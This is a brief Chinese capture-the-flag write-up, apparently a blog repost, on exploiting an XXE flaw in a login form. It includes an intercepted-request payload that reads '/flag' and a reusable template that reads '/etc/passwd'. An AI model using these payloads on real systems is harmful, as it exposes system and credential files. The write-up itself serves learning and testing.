利用XXE漏洞读取文件
参考:https://www.jianshu.com/p/4fc721398e97
首先找到登录源码如下:
由题目可以利用XXE漏洞读取文件
先登录用Burp Suite抓包:
然后构造XXE读取文件
语句如下:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "/flag">
]>
<user>
<username>&f;</username>
<password>024b87931a03f738fff6693ce0a78c88</password>
</user
模板:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
原文地址:https://www.cnblogs.com/clqnotes/p/11922146.html
时间: 2024-10-14 21:34:08